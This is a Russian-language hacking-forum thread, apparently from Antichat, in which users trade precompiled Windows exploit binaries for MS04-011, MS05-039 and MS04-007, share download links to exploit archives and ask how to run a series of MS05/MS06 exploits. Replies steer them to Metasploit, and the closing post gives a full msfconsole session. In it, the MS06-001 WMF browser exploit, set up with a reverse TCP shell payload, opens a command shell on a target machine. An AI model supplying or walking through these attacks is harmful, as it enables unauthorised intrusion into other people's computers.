![]() |
Exploit для Windows
Челы античата вот открыл раздел Exploit для Windows.exe. Для тех кто не может компилить сплойты для Windows, или у кого не компилиться или нет компилятора! Здесь будут выложенны бинарники(готовые) сплойты. Но есть одно НО кто хочит выкладавать бинарники то прошу всех выкладавать ЧИСТАМИ, без троянов и backdoorov!
Буду сам проверять и отписываться! Вот качаем архив со сплойтами для Win windows В архиве содержится сплойты: HOD-ms04011-lsasrv-expl.exe HOD-ms05039-pnp-expl.exe MS04-007-dos.exe ms04011lsass.exe На них документацию можно найти на securitylab.ru Почитать про первый сплойт можно здесь HOD -ms04011-lsasrv-expl. А дальше юзай СЕКЛАБ! Сплойты проверены мной лично антивири кричат говорят что это Exploit.Win32.CAN.2003-0533! |
Цитата:
|
тема конечно полезная, держи +, но "Windows.exe" и "backdoorov" убило))
|
ИМХО, если уж выкладывать такие вещи, то в формате: название = краткое описание (хотя бы локальный или ремоут) = ссылка на полное описание и сурс.
А то так смысл темы немного потеряется. Будут люди просто скидывать типа: ZloSend.exe и ищи его описание.... P.S. Ну и само собой подправить первый пост для этого и потереть остальные. ;) |
Цитата:
|
2A110ut ни говори +))
|
lol... это старо как win 98
бинарники бугогго |
Цитата:
Цитата:
|
Цитата:
|
Цитата:
|
Цитата:
|
Вот к примеру архив с такими сплоитами
http://www.web-hack.ru/download/download.php?go=81 |
ЛЮДИ ! Помогите найти описание или как запустить такие эксплоиты как:
MS05-002 MS05-011 MS05-012 MS05-030 MS05-036 MS05-037 MS05-038 MS05-039 MS05-047 MS05-051 MS05-054 MS06-001 MS06-005 MS06-007 MS06-012 Всё это бездвоздмездно(тоесть даром лежит по адресу :) http://type.nm.ru/exp.htm ) За совет по делу скажу СПОСИБО! :) |
А проект http://metasploit.com собственно для чего делали ?! ....
|
Огромное Спосибо ! Попробую розобратся........
....надо буржуйский язык учить :) |
Цитата:
|
Впринцепе руский и не нужен для работы с метасплоитом... Он начала "атаки" и "шела" максимум 4 клика мыши и нужно ввести ИП "жертвы"
|
Цитата:
|
Цитата:
to Angel_MakKedo - все ссылки на статьи по Метасплоиту, на русском, найдёшь у меня в подписи... |
Цитата:
|
Цитата:
http://forum.antichat.ru/search.php?searchid=655706 оффтоп: Один лентяй другому помагает... :D |
Цитата:
|
Большо спасибо кому не в лом черкнуть пару строк :)
Понял как подключить пациэнта на ms04-011 в Metasploit! Но обьясните как работает ms 05-027 и есть ли этот exploit в Metasloits? |
Цитата:
Цитата:
Цитата:
|
only true hэcker can compile zero sploent.
|
quote:
msf > use windows/browser/ms06_001_wmf_setabortproc msf exploit(ms06_001_wmf_setabortproc) > set LHOST 10.0.0.1 LHOST => 10.0.0.1 msf exploit(ms06_001_wmf_setabortproc) > set PAYLOAD windows/shell_reverse_tcp PAYLOAD => windows/shell_reverse_tcp msf exploit(ms06_001_wmf_setabortproc) > exploit # Started reverse handler # Using URL: http://10.0.0.1:8080/4yWFKnHdHGVHb88Ugyi69ZpK61wE6v4U7c2uHEoIJhWmZux2MC oiTAVa5 # Server started. # Exploit running as background job................ Эксплоит запущен как работа на заднем плане! msf exploit(ms06_001_wmf_setabortproc) > jobs # Command shell session 1 opened (10.0.0.1:4444 -> 10.0.0.2:1495) .....открыта сесcия с cmd msf exploit(ms06_001_wmf_setabortproc) > jobs Jobs ==== Id Name -- ---- 0 Exploit: windows/browser/ms06_001_wmf_setabortproc Ну и как теперь его переключить на передний план задачу с id=0, где пайп с cmd? |
| Время: 21:47 |